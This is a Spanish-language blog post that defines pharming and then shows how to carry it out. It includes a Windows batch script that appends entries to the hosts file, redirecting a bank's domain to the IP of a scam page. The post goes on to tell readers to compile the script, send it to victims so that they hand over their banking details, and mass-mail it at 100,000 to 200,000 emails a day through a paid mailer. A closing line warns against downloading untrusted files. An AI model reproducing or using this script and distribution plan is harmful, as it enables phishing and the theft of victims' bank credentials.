hola ostraigo esto para que sepais que es el pharming.
Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio.
fuente wikipededia
Ahora que sabemos esto como funciona:
ejemplo haremos un bat que modifique el hosts,se copia en el bloc de notas
@echo off
echo 00.000.000.00 http//banco.com >>%windir%\System32\drivers\etc\hosts
echo 00.000.000.00 www.banco.com >>%windir%\System32\drivers\etc\hosts
echo 00.000.000.00 banco.com >>%windir%\System32\drivers\etc\hosts
1.- Donde 00.000.000.00 es donde esta el scam del banco que se quiere entrar
2.- windir%\System32\drivers\etc\hosts (ACA ESTA LA RUTA DEL ARCHIVO QUE VA HACER MODIFICADO PARA HACER LAS REDIRECCIONAMIENTOS)
AHORA LA PREGUNTA DEL MILLON DE DOLARES Y COMO SE LO ENVIO AMI VICTIMA O VICTIMAS
3.- Una vez creado se compila y se manda a la victima ,la victima lo abre y cuando el cree que esta en su banco realmente esta redireccionando al host en el cual hay un scam ,lo abrira como si entrase en la web y lo que hara es darle todos los datos
bancarios a la persona que le manda el codigo malicioso.
PD: PARA HACER ENVIO MASIVOS SOLO SE NECESITAS TENER EMAIL DE VICTIMAS DE UN DETERMINADO PAIS Y ENVIARLOS A TRAVES DE UN MAILER SUBIDO EN UN HOST DE PAGA PARA ENVIAR UNOS 100.000 A 200,000 ENVIOS AL DIA
Espro que les halla servido y recordar no descargar nada que desconfieis, o pasarlo antes por novirusthanks.
0 comentarios:
Publicar un comentario